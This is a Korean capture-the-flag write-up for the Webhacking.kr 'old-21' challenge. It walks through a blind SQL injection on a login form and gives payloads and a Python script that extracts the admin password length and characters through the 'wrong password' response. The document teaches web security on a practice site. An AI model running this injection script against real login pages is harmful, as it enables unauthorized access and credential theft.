[Webhacking.kr] old-21

문제

---

 

 

문제풀이

---

id:guest/pw:guest : login success

id:admin/pw:123 : login fail

id:admin’#/pw:123 : wrong password

 

wrong password 반환할 때를 이용해 blind injection 수행이 가능하다.

 

비밀번호 길이

id : admin’ and length(pw)>30# / pw : 123

위와 같이 유추하여

id : admin’ and length(pw)=36# / pw : 12

-> wrong password

비밀번호 길이가 36임을 찾을 수 있다.

 

비밀번호 문자열

id : admin’ and ascii(substr(pw,1,1)=116#

 

 

import requests

url = 'https://webhacking.kr/challenge/bonus-1/index.php'
cookie = {'PHPSESSID':'bmvg2k4nh4momseflhkh18371h'}

pw_len = 0

for i in range(100):
  payload = "?id=admin\'and%20length(pw)={}%23&pw=1".format(i)
  res = requests.get(url + payload, cookies = cookie)
  if "wrong password" in res.text:
    pw_len = i
    break

print(pw_len)

pw = ""
for i in range(pw_len + 1):
  for j in range(33, 128):
    payload = "?id=admin\'and%20ascii(substr(pw,{},1))={}%23&pw=1".format(i,j)
    res = requests.get(url + payload, cookies = cookie)
    if "wrong password" in res.text:
      pw += chr(j)
      print(pw)
      break

print("비밀번호 : {}".format(pw))